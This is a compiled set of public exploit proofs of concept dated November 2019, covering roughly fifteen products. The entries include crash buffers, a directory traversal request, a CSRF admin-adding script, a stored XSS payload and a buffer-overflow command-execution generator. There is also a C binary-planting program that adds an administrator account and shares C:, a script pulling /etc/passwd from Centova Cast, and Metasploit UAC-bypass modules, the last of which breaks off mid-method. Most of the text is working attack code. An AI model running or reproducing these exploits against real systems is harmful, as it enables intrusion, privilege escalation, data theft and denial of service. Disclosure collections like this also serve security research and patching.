# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-16
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
# Software Link: App Store for iOS devices
# GE Intelligent Platforms, Inc.
# Tested Version: 5.0.0.25920
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2

# Steps to Produce the Crash:
# 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py
# 2.- Copy content to clipboard
# 3.- Open "Open Proficy HMI-SCADA for iOS"
# 4.- Host List > "+"
# 5.- Add Host
# 6.- Address Type "IP Address"
# 7.- Host IP Address "192.168.1.1"
# 8.- User Name "l4m5"
# 9.- Paste ClipBoard on "Password"
# 10.- Add
# 11.- Connect
# 12.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 2500
print (buffer)

# Title: Crystal Live HTTP Server 6.01 - Directory Traversal
# Date of found: 2019-11-17
# Author: Numan Türle
# Vendor Homepage: https://www.genivia.com/
# Version : Crystal Quality 6.01.x.x
# Software Link : https://www.crystalrs.com/crystal-quality-introduction/


POC
---------
GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 2019–14345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10

# Description:
# Web application for management formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.

#Exploit

import requests
import sys

session = requests.Session()

http_proxy = “http://127.0.0.1:8080"
https_proxy = “https://127.0.0.1:8080"

proxyDict = {
“http” : http_proxy,
“https” : https_proxy
}

url = ‘http://localhost/tematres/vocab/login.php'
values = {‘id_correo_electronico’: ‘pablo@tematres.com’,
‘id_password’: ‘admin’,
‘task’:’login’}

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[‘PHPSESSID’]

print (cookie)

host = sys.argv[1]
user = input(‘[+]User:’)
lastname = input(‘[+]lastname:’)
password = input(‘[+]Password:’)
password2 = input(‘[+]Confirm Password:’)
email = input(‘[+]Email:’)

if (password == password2):
#configure proxy burp

data = {
‘_nombre’:user,
‘_apellido’:lastname,
‘_correo_electronico’:email,
‘orga’:’bypassed’,
‘_clave’:password,
‘_confirmar_clave’:password2,
‘isAdmin’:1,
‘boton’:’Guardar’,
‘userTask’:’A’,
‘useactua’:’’

}
headers= {
‘Cookie’: ‘PHPSESSID=’+cookie
}
request = session.post(host+’/tematres/vocab/admin.php’, data=data,
headers=headers, proxies=proxyDict)
print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)
print(‘Status Code:’+ str(request.status_code))

else:
print (‘Passwords dont match!!!’)

# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
# Author: chuyreds
# Discovery Date: 2019-11-16
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"/"IPC"
# 6.- Copy the content of the file into Username
# 7.- Click on Login Check
# 8.- Crashed

buffer = "\x41" * 520
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()

# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)
# Date: 2019-10-20
# Exploit Author: Guy Levin
# https://blog.vastart.dev
# Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng
# Software Link: https://code.google.com/archive/p/nipper-ng/source/default/source
# Version:  0.11.10
# Tested on: Debian
# CVE : CVE-2019-17424

"""
    Exploit generator created by Guy Levin (@va_start - twitter.com/va_start)
    Vulnerability found by Guy Levin (@va_start - twitter.com/va_start)

    For a detailed writeup of CVE-2019-17424 and the exploit building process, read my blog post
    https://blog.vastart.dev/2019/10/stack-overflow-cve-2019-17424.html

    may need to run nipper-ng with enviroment variable LD_BIND_NOW=1 on ceratin systems
"""

import sys
import struct

def pack_dword(i):
    return struct.pack("<I", i)

def prepare_shell_command(shell_command):
    return shell_command.replace("", "${IFS}")

def build_exploit(shell_command):
    EXPLOIT_SKELETON = r"privilage exec level 1 " \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \
"aasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab " \
"kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca " \
"acdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaac " \
"uaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadma " \
"adnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaae " \
"faaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewa " \
"aexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaaf " \
"paafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaagha " \
"agiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaag " \
"zaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahra " \
"ahaaaataahuaahvaahwaahpaaaaaaazaaibaaicaaidaaieaaifaaigaaihaaiiaaijaai " \
"kaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajca " \
"ajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaaj"

    WRITEABLE_BUFFER = 0x080FA001
    CALL_TO_SYSTEM = 0x0804E870
    COMMAND_BUFFER = 0x080FA015 

    OFFSET_FOR_WRITEABLE_BUFFER = 0x326
    OFFSET_FOR_RETURN = 0x33a
    OFFSET_FOR_COMMAND_BUFFER = 0x33e

    OFFSET_FOR_SHELL_COMMAND = 0x2a
    MAX_SHELL_COMMAND_CHARS = 48

    target_values_at_offsets = {
        WRITEABLE_BUFFER : OFFSET_FOR_WRITEABLE_BUFFER, 
        CALL_TO_SYSTEM : OFFSET_FOR_RETURN, 
        COMMAND_BUFFER : OFFSET_FOR_COMMAND_BUFFER
        }

    exploit = bytearray(EXPLOIT_SKELETON, "ascii")

    # copy pointers
    for target_value, target_offset in target_values_at_offsets.items():
        target_value = pack_dword(target_value)
        exploit[target_offset:target_offset+len(target_value)] = target_value

    # copy payload
    if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
        raise ValueError("shell command is too big")
    shell_command = prepare_shell_command(shell_command)
    if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
        raise ValueError("shell command is too big after replacing spaces")

    # adding padding to end of shell command
    for i, letter in enumerate(shell_command + "&&"):
        exploit[OFFSET_FOR_SHELL_COMMAND+i] = ord(letter)

    return exploit

def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} <shell command to execute> <output file>")
        return 1

    try:
        payload = build_exploit(sys.argv[1])
    except Exception as e:
        print(f"error building exploit: {e}")
        return 1

    open(sys.argv[2], "wb").write(payload)

    return 0 # success

if __name__ == '__main__':
    main()

# Exploit Title: TemaTres 3.0 - 'value' Persistent Cross-site Scripting
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 2019–14343
# Reference: https://medium.com/@Pablo0xSantiago/cve-2019-14343-ebc120800053
# Tested on: Windows 10

#Description:
The parameter "value" its vulnerable to Stored Cross-site scripting..

#Payload: “><script>alert(“XSS”)<%2fscript>

POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0)
Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse
Upgrade-Insecure-Requests: 1

doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3edx6e1&alias=ACX&orden=2

# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-15
# Vendor Homepage : https://www.wondershare.net/
# Software Link: https://www.wondershare.net/mobilego/
# Tested on OS: Windows 7 


# Proof of Concept (PoC):
==========================
C:\Program Files\Wondershare\MobileGo>icacls *.exe
adb.exe Everyone:(I)(F)
        AUTORITE NT\Système:(I)(F)
        BUILTIN\Administrateurs:(I)(F)
        BUILTIN\Utilisateurs:(I)(RX)

APKInstaller.exe Everyone:(I)(F)
        AUTORITE NT\Système:(I)(F)
        BUILTIN\Administrateurs:(I)(F)
        BUILTIN\Utilisateurs:(I)(RX)

BsSndRpt.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

DriverInstall.exe Everyone:(I)(F)
                  AUTORITE NT\Système:(I)(F)
                  BUILTIN\Administrateurs:(I)(F)
                  BUILTIN\Utilisateurs:(I)(RX)

fastboot.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

FetchDriver.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

MGNotification.exe Everyone:(I)(F)
                   AUTORITE NT\Système:(I)(F)
                   BUILTIN\Administrateurs:(I)(F)
                   BUILTIN\Utilisateurs:(I)(RX)

MobileGo.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

MobileGoService.exe Everyone:(I)(F)
                    AUTORITE NT\Système:(I)(F)
                    BUILTIN\Administrateurs:(I)(F)
                    BUILTIN\Utilisateurs:(I)(RX)

unins000.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

URLReqService.exe Everyone:(I)(F)
                  AUTORITE NT\Système:(I)(F)
                  BUILTIN\Administrateurs:(I)(F)
                  BUILTIN\Utilisateurs:(I)(RX)

WAFSetup.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

WsConverter.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

WsMediaInfo.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)



#Exploit code(s): 
=================

1) Compile below 'C' code name it as "MobileGo.exe"

#include<windows.h>

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker  /add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
return 0;
} 

2) Rename original "MobileGo.exe" to "~MobileGo.exe"
3) Place our malicious "MobileGo.exe" in the MobileGo directory
4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE. 
Privilege Successful Escalation

# Exploit Title: Centova Cast 3.2.11 - Arbitrary File Download
# Date: 2019-11-17
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.11
# Tested on: Debian 9, CentOS 7

#!/bin/bash
if [ "$4" = "" ]
then
echo "Usage: $0 centovacast_url user password ftpaddress"
exit
fi
url=$1
user=$2
pass=$3
ftpaddress=$4

dwn() {
curl -s -k "$url/api.php?xm=server.copyfile&f=json&a\[username\]=$user&a\[password\]=$pass&a\[sourcefile\]=$1&a\[destfile\]=1.tmp"
wget -q "ftp://$user:$pass@$ftpaddress/1.tmp" -O $2
}

dwn /etc/passwd passwd
echo "

/etc/passwd:
"
cat passwd

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info={})
    super(update_info(info,
'Name'          => 'Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)',
'Description'   => %q(
        This module will bypass Windows UAC by hijacking a special key in the Registry under
        the current user hive, and inserting a custom command that will get invoked when
        Window backup and restore is launched. It will spawn a second shell that has the UAC
        flag turned off.

        This module modifies a registry key, but cleans up the key once the payload has
        been invoked.
      ),
'License'       => MSF_LICENSE,
'Author'        => [
'enigma0x3',   # UAC bypass discovery and research
'bwatters-r7', # Module
        ],
'Platform'      => ['win'],
'SessionTypes'  => ['meterpreter'],
'Targets'       => [
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
      ],
'DefaultTarget' => 0,
'Notes'         =>
        {
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
        },
'References'    =>
        [
          ['URL', 'https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/'],
          ['URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1'],
          ['URL', 'https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass']
        ],
'DisclosureDate' => 'Mar 17 2017'
      )
    )
    register_options(
      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
    )

  end

  def check
    if sysinfo['OS'] =~ /Windows (Vista|7|8|2008|2012|2016|10)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def write_reg_values(registry_key, payload_pathname)
    begin
      registry_createkey(registry_key) unless registry_key_exist?(registry_key)
      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
      registry_setvaldata(registry_key, '', payload_pathname, "REG_SZ")
    rescue ::Exception => e
      print_error(e.to_s)
    end
  end

  def exploit
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
    remove_registry_key = !registry_key_exist?(registry_key)

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
    vprint_status("win_dir = " + win_dir)
    tmp_dir = session.sys.config.getenv('tmp')
    vprint_status("tmp_dir = " + tmp_dir)
    exploit_dir = win_dir + "\\System32\\"
    vprint_status("exploit_dir = " + exploit_dir)
    target_filepath = exploit_dir + "sdclt.exe"
    vprint_status("exploit_file = " + target_filepath)

    # make payload
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) + '.exe'
    payload_pathname = tmp_dir + '\\' + payload_name
    vprint_status("payload_pathname = " + payload_pathname)
    vprint_status("Making Payload")
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
    write_reg_values(registry_key, reg_command)

    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status("Payload Upload Complete")

    vprint_status("Launching " + target_filepath)
    begin
      session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
    rescue ::Exception => e
      print_error("Executing command failed:\n#{e}")
    end
    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
    # wait for a few seconds before cleaning up
    print_status("Please wait for session and cleanup....")
    sleep(20)
    vprint_status("Removing Registry Changes")
    if remove_registry_key
      registry_deletekey(registry_key)
    else
      registry_deleteval(registry_key, "DelegateExecute")
      registry_deleteval(registry_key, '')
    end
    print_status("Registry Changes Removed")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    case is_in_admin_group?
    when true
      print_good('Part of Administrators group! Continuing...')
      if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
        fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
      end
    when false
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    when nil
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    end
  end

end

#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.filehorse.com/
#Link Software : https://www.filehorse.com/download-bartvpn/
#Tested on OS: Windows 7


#Analyze PoC :
==============


C:\Users\ZwX>sc qc BartVPNService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: BartVPNService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BartVPNService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.xmedia-recode.de/
#Link Software : https://www.xmedia-recode.de/download.php
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr

'''
Proof of Concept (PoC):
=======================

1.Download and install XMedia Recode 
2.Run the python operating script that will create a file (poc.m3u)
3.Run the software "File -> Open File -> Add the file (.m3u) "
4.XMedia Recode Crashed
'''

#!/usr/bin/python

http = "http://"
buffer = "\x41" * 500 

poc = http + buffer
file = open("poc.m3u,"w")
file.write(poc)
file.close()

print "POC Created by ZwX"

# Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.rockwellautomation.com/en_NA/overview.page
# Software Link : https://www.rockwellautomation.com/en_NA/products/factorytalk/overview.page?pagetitle=Studio-5000-Logix-Designer&docid=924d2f2060bf9d409286937296a18142
# Rockwell Automation Technologies
# Tested Version: 30.01.00
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path: 

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Rockwell" |findstr /i /v """

FactoryTalk Activation Service    FactoryTalk Activation Service     C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe  Auto

# Service info:

C:\>sc qc "FactoryTalk Activation Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FactoryTalk Activation Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FactoryTalk Activation Service
        DEPENDENCIES       : winmgmt
                           : wmiapsrv
                           : +NetworkProvider
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
# Date: 2019-11-18
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.12
# Tested on: Debian 9, CentOS 7
# ===============================================
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.

#!/bin/bash
if [ "$3" = "" ]
then
echo "Usage: $0 centovacast_url reseller/admin password"
exit
fi
url=$1
reseller=$2
pass=$3


dwn() {
echo -n .
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero"&
}

for i in {0..32}
do
dwn /dev/zero
sleep .1
done
echo "
Done!"

# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-18
# Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634
# Software Link: App Store for iOS devices
# Tested Version: 1.1.4.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2

# Steps to Produce the Crash:
# 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py
# 2.- Copy content to clipboard
# 3.- Open "scadaApp for iOS"
# 4.- Let's go
# 5.- Username > "l4m5"
# 6.- Password > "l4m5"
# 7.- Paste ClipBoard on "Servername"
# 8.- Login
# 9.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 257
print (buffer)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info={})
    super(update_info(info,
'Name'          => 'Windows Escalate UAC Protection Bypass (Via dot net profiler)',
'Description'   => %q(
      Microsoft Windows allows for the automatic loading of a profiling COM object during
      the launch of a CLR process based on certain environment variables ostensibly to
      monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL
      that will be launched as the profiling thread.  This thread will run at the permission
      level of the calling process, so an auto-elevating process will launch the DLL with
      elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR
      process, but others would work, too.
      ),
'License'       => MSF_LICENSE,
'Author'        => [
'Casey Smith',   # UAC bypass discovery and research
'"Stefan Kanthak"<stefan.kanthak () nexgo de>',   # UAC bypass discovery and research
'bwatters-r7', # Module
        ],
'Platform'      => ['win'],
'SessionTypes'  => ['meterpreter'],
'Targets'       => [
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
      ],
'DefaultTarget' => 0,
'Notes'         =>
        {
'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
'References'    =>
        [
          ['URL', 'https://seclists.org/fulldisclosure/2017/Jul/11'],
          ['URL', 'https://offsec.provadys.com/UAC-bypass-dotnet.html']
        ],
'DisclosureDate' => 'Mar 17 2017'
      )
    )
    register_options(
      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
    )

  end

  def check
    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def write_reg_value(registry_hash)
    vprint_status("Writing #{registry_hash[:value_name]} to #{registry_hash[:key_name]}")
    begin
      if not registry_key_exist?(registry_hash[:key_name])
        registry_createkey(registry_hash[:key_name])
        registry_hash[:delete_on_cleanup] = true
      else
        registry_hash[:delete_on_cleanup] = false
      end
      registry_setvaldata(registry_hash[:key_name], \
                          registry_hash[:value_name], \
                          registry_hash[:value_value], \
                          registry_hash[:value_type])
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error(e.to_s)
    end
  end

  def remove_reg_value(registry_hash)
    # we may have already deleted the key
    return unless registry_key_exist?(registry_hash[:key_name])
    begin
      if registry_hash[:delete_on_cleanup]
        vprint_status("Deleting #{registry_hash[:key_name]} key")
        registry_deletekey(registry_hash[:key_name])
      else
        vprint_status("Deleting #{registry_hash[:value_name]} from #{registry_hash[:key_name]} key")
        registry_deleteval(registry_hash[:key_name], registry_hash[:value_name])
      end
    rescue Rex::Post::Meterpreter::RequestError => e
      print_bad("Unable to clean up registry")
      print_error(e.to_s)
    end
  end

  def exploit
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
    vprint_status("win_dir = " + win_dir)
    tmp_dir = session.sys.config.getenv('tmp')
    vprint_status("tmp_dir = " + tmp_dir)
    exploit_dir = win_dir + "\\System32\\"
    vprint_status("exploit_dir = " + exploit_dir)
    target_filepath = exploit_dir + "gpedit.msc"
    vprint_status("target_filepath = " + target_filepath)
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.dll'
    payload_pathname = tmp_dir + '\\' + payload_name

    # make payload
    vprint_status("Making Payload")
    vprint_status("payload_pathname = " + payload_pathname)
    payload = generate_payload_dll

    uuid = SecureRandom.uuid
    vprint_status("UUID = #{uuid}")
    reg_keys = []
    # This reg key will not hurt anything in windows 10+, but is not required.
    unless sysinfo['OS'] =~ /Windows (2016|10)/
      reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                    value_name: '',
                    value_type: "REG_EXPAND_SZ",
                    value_value: payload_pathname,
                    delete_on_cleanup: false)
    end
    reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_PROFILER",
                  value_type: "REG_SZ",
                  value_value: "{#{uuid}}",
                  delete_on_cleanup: false)
    reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_ENABLE_PROFILING",
                  value_type: "REG_SZ",
                  value_value: "1",
                  delete_on_cleanup: false)
    reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_PROFILER_PATH",
                  value_type: "REG_SZ",
                  value_value: payload_pathname,
                  delete_on_cleanup: false)
    reg_keys.each do |key_hash|
      write_reg_value(key_hash)
    end

    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status("Payload Upload Complete")

    vprint_status("Launching " + target_filepath)
    begin
      session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
    # wait for a few seconds before cleaning up
    print_status("Please wait for session and cleanup....")
    sleep(20)
    vprint_status("Removing Registry Changes")
    reg_keys.each do |key_hash|
      remove_reg_value(key_hash)
    end
    vprint_status("Registry Changes Removed")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

